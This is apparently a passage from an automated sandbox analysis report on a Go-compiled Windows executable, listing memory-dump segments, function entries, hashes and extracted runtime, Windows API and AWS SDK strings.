              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamS$ - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDl$ base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-regionBucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTa$ etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeor$ not in ranges:invalid exchangeno route to hostinvalid argumentmessage too longobject is remoteremote I/O errorSetFilePointerExOpenProcessTokenRegQueryInfoKeyWRegQueryValueExWDnsNameCompare_WCreateDirectoryWFlushFileBuffersGetComputerNameWGetFullPathNameWGetL$ out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 haltedlevel 3 haltedtoo many linksno such deviceprotocol errortext file busytoo many usersCryptGenRandomCertCloseStoreCreateProcessWFindFirstFileWFormatMessageWGetConso$!$runtime: name offset base pointer out of rangeruntime: type offset base pointer out of rangeruntime: text offset base pointer out of rangeTime.UnmarshalJSON: input is not a JSON stringfailed to find credentials in the environment.reflect: nil type passed to Ty$runtime: name offset out of rangeruntime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttributeListAWS_EC2_METADATA_SERVICE_ENDPOINTSharedConfigProfileNotExistsErrorfailed to unmarshal error messageCryptAcquireCertificatePrivat$runtime: nameOff runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec format errorLookupAccountSidWDnsRecordListFreeGetCurrentProcessGetShortPathNameWWSAEnumProtocolsWGTB Standard TimeFLE Standard TimeGMT Standard Timefract
              • API String ID: 0-2314725458
              • Opcode ID: c6969af03c98c06725a27b27b51e06404744b3c1e97cab0e777fd887b784c545
              • Instruction ID: dad42f988add8c79b7f7a0884dcc9083d3522cb14d945e876f888abcac339d1f
              • Opcode Fuzzy Hash: c6969af03c98c06725a27b27b51e06404744b3c1e97cab0e777fd887b784c545
              • Instruction Fuzzy Hash: 0561F3B450A345DFD344EF64D189BAEBBE4FF89704F40882DE48887352E7789988DB52
              Function 007E1600 Relevance: 11.5, Strings: 9, Instructions: 244COMMON
              Download Yara Rule
              Strings
              • , locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS specific erroridentifier removedinput/output errormultihop attemptedfile name too longno locks availablestreams pipe errorLookupAccountNameWCreateFi, xrefs: 007E194C
              • minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthi, xrefs: 007E191E
              • unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep: , xrefs: 007E1685
              • goroutine terminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dlltime.Date(time.Local%!Weekday(not a boolAWS_REGIONsso_regionFailedReadprofile %smfa_serialCopyObjectUploadPartPartNumber, xrefs: 007E174A
              • m=nil base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-regionBucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTa, xrefs: 007E1854
              • m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPUTKeyTa, xrefs: 007E17FC
              • (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianS, xrefs: 007E18B3
              • ???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPUTKeyTags3-): subHanLaoMroNkoVa, xrefs: 007E165D
              • gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtpmdnsdial unixxn--ermssse3avx2bmi1bmi2aossfipsgluelogs, xrefs: 007E17B3
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianS$ gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtpmdnsdial unixxn--ermssse3avx2bmi1bmi2aossfipsgluelogs$ m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPUTKeyTa$ m=nil base hangupkilledlistensocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecond-fips-regionBucket%s[%v]PolicyGetAceGetACPsendtoCommonArabicBrahmiCarianChakmaCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTa$ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthi$, locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS specific erroridentifier removedinput/output errormultihop attemptedfile name too longno locks availablestreams pipe errorLookupAccountNameWCreateFi$???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14StdDltPUTKeyTags3-): subHanLaoMroNkoVa$goroutine terminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dlltime.Date(time.Local%!Weekday(not a boolAWS_REGIONsso_regionFailedReadprofile %smfa_serialCopyObjectUploadPartPartNumber$unknown wait reasonnotesleep not on g0GC work not flushed/gc/scan/heap:bytes/gc/heap/goal:bytes/gc/heap/live:bytesbad kind in runfinqmarkroot: bad indexnwait > work.nprocs, gp->atomicstatus=marking free object KiB work (eager), [controller reset]mspan.sweep:
              • API String ID: 0-2811265527
              • Opcode ID: 0ce103a19477a1ec20eb66b6cbae071facc393da83aec2b5c81dc9a55c91fa6b
              • Instruction ID: ee0998d6f924daf8e2f3c32ab0274367723a5de362c8ed46b4522d38fe20f99e
              • Opcode Fuzzy Hash: 0ce103a19477a1ec20eb66b6cbae071facc393da83aec2b5c81dc9a55c91fa6b
              • Instruction Fuzzy Hash: 93A1127460A349CFC705EFA5C186B9EB7E1BF89700F40882DE88587352DB38E845DB92
              Function 00781CB0 Relevance: 10.3, Strings: 8, Instructions: 326COMMON
              Download Yara Rule
              Strings
              • cpu., xrefs: 00781D21
              • ", missing CPU supportVariantTimeToSystemTimeSafeArrayCreateVectorExUS West (N. California)application-autoscalingentitlement.marketplacelogs.af-south-1.api.awslogs.ap-south-1.api.awslogs.ap-south-2.api.awslogs.eu-north-1.api.awslogs.eu-south-1.api.awslogs.eu, xrefs: 00781F5F
              • GODEBUG: no value specified for "unaligned 64-bit atomic operationappmesh-fips.ca-central-1.api.awsbedrock-runtime-fips-ca-central-1cloudcontrolapi.ap-east-1.api.awscloudcontrolapi.ca-west-1.api.awscloudcontrolapi.eu-west-1.api.awscloudcontrolapi.eu-west-2.api, xrefs: 00781E93
              • GODEBUG: can not enable "unexpected key value typeWindowsGetStringRawBufferSouth America (Sao Paulo)appmesh.ap-east-1.api.awsappmesh.eu-west-1.api.awsappmesh.eu-west-2.api.awsappmesh.eu-west-3.api.awsappmesh.sa-east-1.api.awsappmesh.us-east-1.api.awsappmesh.us, xrefs: 00781F35
              • !, xrefs: 00781E9C
              • GODEBUG: unknown cpu feature "{service}.{region}.{dnsSuffix}appmesh.ap-northeast-1.api.awsappmesh.ap-northeast-2.api.awsappmesh.ap-northeast-3.api.awsappmesh.ap-southeast-1.api.awsappmesh.ap-southeast-2.api.awsappmesh.ap-southeast-3.api.awsappmesh-fips.us-east, xrefs: 00782074
              • GODEBUG: value "CoCreateInstanceSafeArrayDestroyDispatchMessageWamazonaws.com.cnCanada (Central)Europe (Ireland)US West (Oregon)amplifyuibuilderapi.fleethub.iotapp-integrationsbillingconductorcognito-identityelasticbeanstalkelasticmapreduceIngestionServiceinge, xrefs: 00781E0A
              • " not supported for cpu option "acm-fips.ca-west-1.amazonaws.comacm-fips.us-east-1.amazonaws.comacm-fips.us-east-2.amazonaws.comacm-fips.us-west-1.amazonaws.comacm-fips.us-west-2.amazonaws.comapi.ecr.af-south-1.amazonaws.comapi.ecr.ap-south-1.amazonaws.comapi., xrefs: 00781E34
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: !$" not supported for cpu option "acm-fips.ca-west-1.amazonaws.comacm-fips.us-east-1.amazonaws.comacm-fips.us-east-2.amazonaws.comacm-fips.us-west-1.amazonaws.comacm-fips.us-west-2.amazonaws.comapi.ecr.af-south-1.amazonaws.comapi.ecr.ap-south-1.amazonaws.comapi.$", missing CPU supportVariantTimeToSystemTimeSafeArrayCreateVectorExUS West (N. California)application-autoscalingentitlement.marketplacelogs.af-south-1.api.awslogs.ap-south-1.api.awslogs.ap-south-2.api.awslogs.eu-north-1.api.awslogs.eu-south-1.api.awslogs.eu$GODEBUG: can not enable "unexpected key value typeWindowsGetStringRawBufferSouth America (Sao Paulo)appmesh.ap-east-1.api.awsappmesh.eu-west-1.api.awsappmesh.eu-west-2.api.awsappmesh.eu-west-3.api.awsappmesh.sa-east-1.api.awsappmesh.us-east-1.api.awsappmesh.us$GODEBUG: no value specified for "unaligned 64-bit atomic operationappmesh-fips.ca-central-1.api.awsbedrock-runtime-fips-ca-central-1cloudcontrolapi.ap-east-1.api.awscloudcontrolapi.ca-west-1.api.awscloudcontrolapi.eu-west-1.api.awscloudcontrolapi.eu-west-2.api$GODEBUG: unknown cpu feature "{service}.{region}.{dnsSuffix}appmesh.ap-northeast-1.api.awsappmesh.ap-northeast-2.api.awsappmesh.ap-northeast-3.api.awsappmesh.ap-southeast-1.api.awsappmesh.ap-southeast-2.api.awsappmesh.ap-southeast-3.api.awsappmesh-fips.us-east$GODEBUG: value "CoCreateInstanceSafeArrayDestroyDispatchMessageWamazonaws.com.cnCanada (Central)Europe (Ireland)US West (Oregon)amplifyuibuilderapi.fleethub.iotapp-integrationsbillingconductorcognito-identityelasticbeanstalkelasticmapreduceIngestionServiceinge$cpu.
              • API String ID: 0-371206981
              • Opcode ID: 8904e9e2ec9c6b55bf2161801bd0f9a60cf5a45e331fbfc241a9eb9e3aff6cc1
              • Instruction ID: 191f9043d9fcbae0e38da98beccebfc90b5b476e7831ebd5ca835ce922f39b71
              • Opcode Fuzzy Hash: 8904e9e2ec9c6b55bf2161801bd0f9a60cf5a45e331fbfc241a9eb9e3aff6cc1
              • Instruction Fuzzy Hash: D1D1BC70649309CFC714EF64C48466EB7E6BB89304F54892DE886DB342E778DC46DB92
              Function 007A10C0 Relevance: 10.2, Strings: 8, Instructions: 239COMMON
              Download Yara Rule
              Strings
              • s.limit= s.state= B work ( B exp.) marked unmarked in use), size = , tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= m->curg=(unknown)traceback} stack=[ lockedm=interruptbus errorFindCloseLocalFre, xrefs: 007A11AB
              • s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc=, xrefs: 007A1181
              • ) = <==GOGC] = pc=none+Inf-Inf: p=cas1cas2cas3cas4cas5cas6 at m= sp= sp: lr: fp= gp= mp=) m=quitbindJuneJulyEESTSASTAKSTAKDTACSTACDTAESTAEDTAWSTCESTNZSTNZDT as hourTagsTypeNONEarn:AhomChamKawiLisuMiaoModiNewaThaiToto3125Atoiint8uintchanfuncpartcallkind on , xrefs: 007A140E
              • unknown(trigger= npages= nalloc= nfreed=runtime.[signal reflect. newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_, xrefs: 007A12A5
              • s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, gp->status= pluginpath= runtime: pid=: unknown pc called from level 3 reset, xrefs: 007A11D5
              • ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamil1562578125, xrefs: 007A1389, 007A1494
              • *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMS, xrefs: 007A13BA
              • s=nil (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidS, xrefs: 007A1335
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: *(in n= ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMS$ ... max=scav ptr ] = (usageinit ms, fault and tab= top=[...], fp:ntohsMarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalCount-fipsfips-ValueCall GreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamil1562578125$ s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc=$ s.limit= s.state= B work ( B exp.) marked unmarked in use), size = , tail = recover: not in [ctxt != 0, oldval=, newval= threads=: status= blocked= lockedg=atomicor8 runtime= 